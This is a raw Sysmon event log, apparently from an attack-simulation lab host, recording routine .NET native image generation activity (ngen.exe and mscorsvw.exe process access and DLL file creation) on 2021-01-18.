13:46:01.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A201-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.609{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A101-00000000A301}2532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.531{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-A001-00000000A301}3304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:02.484{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ed4-0\Microsoft.Activities.Build.dll2021-01-18 13:46:02.484 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:02.281{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911A-6005-9F01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.547{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.547{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911B-6005-A401-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:03.094{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911B-6005-A301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:07.984{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\614-0\Microsoft.Build.Conversion.v4.0.dll2021-01-18 13:46:07.984 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.844{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.844{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-911F-6005-A601-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:07.750{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-911F-6005-A501-00000000A301}2352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 